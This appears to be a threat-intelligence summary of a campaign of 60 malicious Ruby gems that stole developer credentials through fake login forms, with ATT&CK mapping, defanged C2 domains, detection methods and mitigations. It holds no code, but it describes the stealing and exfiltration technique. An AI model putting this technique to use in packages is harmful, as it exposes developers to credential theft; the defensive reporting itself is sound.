Full Report
Sixty malicious Ruby gems containing credential-stealing code have been downloaded over 275,000 times since March 2023, targeting developer accounts. [...]
Analysis Summary
# Tool/Technique: Malicious Ruby Gems (Credential Stealing)
## Overview
A collection of 60 malicious Ruby gems distributed via the RubyGems repository, which were downloaded approximately 275,000 times. These gems masqueraded as legitimate development tools, but their true purpose was to steal user credentials entered into fake login forms.
## Technical Details
- Type: Malware (Supply Chain Attack Payload)
- Platform: Ruby/Development Environments (likely targeting systems running Ruby applications or development tools)
- Capabilities: Interception and exfiltration of plaintext usernames and passwords, collection of MAC addresses for device fingerprinting, and package name tracking for campaign measurement.
- First Seen: Information not explicitly stated, but part of a recent discovery reported by Socket.
## MITRE ATT&CK Mapping
Based on the described functionality (stealing credentials from login forms during interaction):
- **TA0001 - Initial Access**
- T1190 - Exploit Public-Facing Application (If the legitimate gem was part of a publicly facing service/application build process)
- **TA0006 - Credential Access**
- T1056 - Input Capture
- T1056.001 - Keylogging (If actual keystrokes are captured, though form submission capture is more likely)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel
## Functionality
### Core Capabilities
- **Credential Harvesting:** Luring developers or users into entering credentials (usernames and passwords) into a captive login form embedded within the gem's routine.
- **Data Exfiltration:** Sending harvested plaintext credentials, MAC addresses, and package names to hardcoded command-and-control (C2) infrastructure.
- **Deception:** Responding with fake success or failure messages to mask the theft, as no actual legitimate API call is performed.
### Advanced Features
- **Fingerprinting:** Collecting the device's MAC address for device identification and tracking.
- **Campaign Tracking:** Collecting the name of the package being used to track the reach and effectiveness of the specific malicious gem variant.
- **Persistence/Reach:** Leveraging the high download count and trust associated with the RubyGems ecosystem for wide, low-friction distribution.
## Indicators of Compromise
- File Hashes: [Not provided in the source text]
- File Names: Malicious Ruby Gems (60 unique packages)
- Registry Keys: [Not applicable/Not provided]
- Network Indicators:
- `programzon[.]com`
- `appspace[.]kr`
- `marketingduo[.]co[.]kr` (Linked to observed credential logs)
- Behavioral Indicators:
- Execution of code designed to present a login/authentication prompt that does not correspond to the expected behavior of the installed library.
- Outbound communication to the hardcoded C2 domains containing sensitive credentials in plaintext.
## Associated Threat Actors
- Attribution is not explicitly made to a named group, but logs suggest connections to actors monitoring Russian-speaking darknet markets via the `marketingduo[.]co[.]kr` infrastructure.
## Detection Methods
- Signature-based detection: Detecting known malicious Ruby gem package names or artifacts/code patterns within the gems.
- Behavioral detection: Monitoring outbound network connections from development environments or applications using newly installed Ruby gems to suspicious, non-standard domains, especially those involving plaintext credential transmission.
- YARA rules: Applicable for detecting common code patterns or embedded strings related to the exfiltration mechanism across potential future variants.
## Mitigation Strategies
- **Dependency Vetting:** Developers must scrutinize all third-party libraries sourced from open-source repositories (like RubyGems) for signs of suspicious behavior, such as obfuscated code.
- **Reputation Checking:** Verifying the publisher’s reputation and release history before adopting new dependencies.
- **Dependency Locking:** Locking dependencies to specific, known-to-be-safe versions to prevent automatic updates to potentially compromised releases.
- **Network Monitoring:** Implementing egress filtering or monitoring to detect unauthorized transmissions of credentials or sensitive system information outside the standard application flow.
## Related Tools/Techniques
- Previous Malicious Ruby Gems targeting Fastlane/Telegram API developers (supply chain attack vectors).
- Supply chain attacks leveraging other package managers (e.g., npm, PyPI).